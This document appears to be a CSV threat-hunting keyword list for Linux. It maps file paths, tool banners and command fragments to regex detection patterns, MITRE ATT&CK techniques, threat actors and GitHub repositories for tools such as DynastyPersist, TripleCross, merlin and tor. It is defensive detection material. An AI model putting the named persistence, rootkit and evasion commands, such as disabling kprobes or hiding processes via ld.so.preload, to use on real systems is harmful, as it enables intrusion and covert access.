"*/DNS-Hijacking.git*",".{0,1000}\/DNS\-Hijacking\.git.{0,1000}","offensive_tool_keyword","DNS-Hijacking","DNS Hijacking in UNIX/Linux System by using raw socket and pcap","T1496 - T1040 - T1071.004 - T1090","TA0040 - TA0002 - TA0009","N/A","Sea Turtle","Sniffing & Spoofing","https://github.com/DyeKuu/DNS-Hijacking","1","1","#linux","N/A","9","1","5","2","2020-05-31T23:03:34Z","2020-05-02T08:49:22Z"
"*DyeKuu/DNS-Hijacking*",".{0,1000}DyeKuu\/DNS\-Hijacking.{0,1000}","offensive_tool_keyword","DNS-Hijacking","DNS Hijacking in UNIX/Linux System by using raw socket and pcap","T1496 - T1040 - T1071.004 - T1090","TA0040 - TA0002 - TA0009","N/A","Sea Turtle","Sniffing & Spoofing","https://github.com/DyeKuu/DNS-Hijacking","1","1","#linux","N/A","9","1","5","2","2020-05-31T23:03:34Z","2020-05-02T08:49:22Z"
"* dynasty.sh*",".{0,1000}\sdynasty\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*./dynasty.sh*",".{0,1000}\.\/dynasty\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*/DynastyPersist.git*",".{0,1000}\/DynastyPersist\.git.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*/DynastyPersist/src/*.sh*",".{0,1000}\/DynastyPersist\/src\/.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*[+] - Linux header / Message Of The Day Persistence*",".{0,1000}\[\+\]\s\-\sLinux\sheader\s\/\sMessage\sOf\sThe\sDay\sPersistence.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*[+] - Rootkit Configuration*",".{0,1000}\[\+\]\s\-\sRootkit\sConfiguration.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*[+] - Rootkit configured successfully*",".{0,1000}\[\+\]\s\-\sRootkit\sconfigured\ssuccessfully.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*[+] - Setting up cronjobs for persistence ... *",".{0,1000}\[\+\]\s\-\sSetting\sup\scronjobs\sfor\spersistence\s\.\.\.\s.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*/ddsc.sh *",".{0,1000}\/ddsc\.sh\s.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","8","799","83","2023-06-09T13:54:30Z","2022-01-27T12:52:10Z"
"*[+] - Systemd Root Level Service successfully configued!*",".{0,1000}\[\+\]\s\-\sSystemd\sRoot\sLevel\sService\ssuccessfully\sconfigued!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*/deepce.sh *--install*",".{0,1000}\/deepce\.sh\s.{0,1000}\-\-install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","1968","190","2024-11-09T16:23:46Z","2020-03-09T19:12:11Z"
"*[+] Success! LD_PRELOAD has been added!*",".{0,1000}\[\+\]\sSuccess!\sLD_PRELOAD\shas\sbeen\sadded!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*\DynastyPersist\src\*.sh*",".{0,1000}\\DynastyPersist\\src\\.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*<title>Dynasty Persist</title>*",".{0,1000}\<title\>Dynasty\sPersist\<\/title\>.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*D Y N A S T Y  - P E R S I S T*",".{0,1000}D\sY\sN\sA\sS\sT\sY\s\s\-\sP\sE\sR\sS\sI\sS\sT.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*dynasty_rce/rce.php*",".{0,1000}dynasty_rce\/rce\.php.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*DynastyPersist-main.zip*",".{0,1000}DynastyPersist\-main\.zip.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*ExecStartPre present! ExecStartPre was modified!*",".{0,1000}ExecStartPre\spresent!\sExecStartPre\swas\smodified!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*https://github.com/m0nad/Diamorphine*",".{0,1000}https\:\/\/github\.com\/m0nad\/Diamorphine.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*LDPreloadPrivesc*",".{0,1000}LDPreloadPrivesc.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*Made by: @Trevohack | @opabravo | @matheuz*",".{0,1000}Made\sby\:\s\@Trevohack\s\|\s\@opabravo\s\|\s\@matheuz.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*Modified by: Trevohack aka *SpaceShuttleIO*",".{0,1000}Modified\sby\:\sTrevohack\saka\s.{0,1000}SpaceShuttleIO.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*php -S 0.0.0.0:9056 &*",".{0,1000}php\s\-S\s0\.0\.0\.0\:9056\s\&.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*spaceshuttle.io.all@gmail.com*",".{0,1000}spaceshuttle\.io\.all\@gmail\.com.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#email #linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*Trevohack/DynastyPersist*",".{0,1000}Trevohack\/DynastyPersist.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*echo 0 > /sys/kernel/debug/kprobes/enabled*",".{0,1000}echo\s0\s\>\s\/sys\/kernel\/debug\/kprobes\/enabled.{0,1000}","greyware_tool_keyword","echo","This command disables kprobes by writing '0' to the enabled file. Kprobes are dynamic breakpoints in the Linux kernel that can be used to intercept functions and gather information for debugging or monitoring.","T1562.001 - T1055 - T1070.004","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/3proxy/conf*",".{0,1000}\/etc\/3proxy\/conf.{0,1000}","greyware_tool_keyword","3proxy","3proxy - tiny free proxy server","T1090 - T1583 - T1001 - T1132","TA0040 - TA0001 - TA0005 - TA0006","N/A","Lazarus Group","Defense Evasion","https://github.com/3proxy/3proxy","1","0","#linux","N/A","8","10","3981","781","2024-09-11T15:34:46Z","2014-04-08T08:59:11Z"
"*/etc/capabilities/shadowsocks.json*",".{0,1000}\/etc\/capabilities\/shadowsocks\.json.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#linux","N/A","10","10","8751","1194","2024-12-07T22:26:08Z","2014-10-15T11:02:36Z"
"*/etc/cron.d/ebpfbackdoor*",".{0,1000}\/etc\/cron\.d\/ebpfbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*/etc/cron.weekly/tor*",".{0,1000}\/etc\/cron\.weekly\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/crowbar/*",".{0,1000}\/etc\/crowbar\/.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","Dispossessor","C2","https://github.com/q3k/crowbar","1","0","#linux","N/A","10","10","475","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/etc/crowbard.conf*",".{0,1000}\/etc\/crowbard\.conf.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","Dispossessor","C2","https://github.com/q3k/crowbar","1","0","#linux","N/A","10","10","475","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/etc/dataplicity*",".{0,1000}\/etc\/dataplicity.{0,1000}","greyware_tool_keyword","Dataplicity","enables connecting local systems to dataplicity cloud for remotely accessing them over the internet.","T1090 - T1102 - T1043 - T1071","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/wildfoundry/dataplicity-agent","1","0","#linux","N/A","9","2","166","32","2024-06-10T20:17:43Z","2016-07-27T14:23:01Z"
"*/etc/default/dropbear*",".{0,1000}\/etc\/default\/dropbear.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1754","403","2024-12-04T16:13:34Z","2013-03-19T11:15:36Z"
"*/etc/default/tor",".{0,1000}\/etc\/default\/tor","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/dropbear/*",".{0,1000}\/etc\/dropbear\/.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1754","403","2024-12-04T16:13:34Z","2013-03-19T11:15:36Z"
"*/etc/ehorus/ehorus_agent*",".{0,1000}\/etc\/ehorus\/ehorus_agent.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/fleet/fleet.env*",".{0,1000}\/etc\/fleet\/fleet\.env.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#linux","N/A","10","10","3183","437","2024-12-08T00:28:45Z","2020-11-03T22:17:18Z"
"*/etc/gsocket.conf*",".{0,1000}\/etc\/gsocket\.conf.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1549","132","2024-12-05T00:41:10Z","2020-09-18T16:14:22Z"
"*/etc/init.d/ehorus_agent_daemon*",".{0,1000}\/etc\/init\.d\/ehorus_agent_daemon.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/init.d/tor start*",".{0,1000}\/etc\/init\.d\/tor\sstart.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","#linux","N/A","9","10","1967","315","2024-12-06T11:39:49Z","2015-09-07T18:47:10Z"
"*/etc/init.d/tor stop*",".{0,1000}\/etc\/init\.d\/tor\sstop.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","#linux","N/A","9","10","1967","315","2024-12-06T11:39:49Z","2015-09-07T18:47:10Z"
"*/etc/init.d/tor*",".{0,1000}\/etc\/init\.d\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/init.d/tor*",".{0,1000}\/etc\/init\.d\/tor.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","707","176","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z"
"*/etc/init.d/tor2web*",".{0,1000}\/etc\/init\.d\/tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","707","176","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z"
"*/etc/kidlogger*",".{0,1000}\/etc\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/ld.so.preload && rm* process successfully hidden*",".{0,1000}\/etc\/ld\.so\.preload\s\&\&\srm.{0,1000}\sprocess\ssuccessfully\shidden.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","#linux","N/A","10","10","5102","805","2024-12-02T17:53:56Z","2017-01-06T11:18:20Z"
"*/etc/letsencrypt/live/jprq.site/*",".{0,1000}\/etc\/letsencrypt\/live\/jprq\.site\/.{0,1000}","greyware_tool_keyword","jprq","expose TCP protocols such as HTTP - SSH etc. Any server!","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/azimjohn/jprq","1","0","#linux","N/A","10","10","1037","148","2024-11-01T08:39:24Z","2020-04-18T10:12:42Z"
"*/etc/level/config.yaml*",".{0,1000}\/etc\/level\/config\.yaml.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/ltproxy.yml*",".{0,1000}\/etc\/ltproxy\.yml.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","#linux","N/A","10","1","31","5","2024-11-27T05:09:47Z","2021-11-11T15:17:54Z"
"*/etc/nps/conf/*",".{0,1000}\/etc\/nps\/conf\/.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#linux","N/A","9","10","2360","302","2024-11-21T09:23:24Z","2022-09-14T06:24:00Z"
"*/etc/pagekite.d*",".{0,1000}\/etc\/pagekite\.d.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#linux","N/A","10","10","725","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z"
"* /r /proxy  /proxyport  /proxyusername  /proxypasswd *",".{0,1000}\s\/r\s\/proxy\s\s\/proxyport\s\s\/proxyusername\s\s\/proxypasswd\s.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/proxychains.conf*",".{0,1000}\/etc\/proxychains\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#linux","https://x.com/mthcht/status/1827714529687658796","8","10","6843","631","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z"
